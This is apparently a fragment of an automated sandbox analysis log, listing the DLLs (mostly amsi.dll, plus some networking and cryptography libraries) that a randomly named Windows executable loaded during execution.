Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
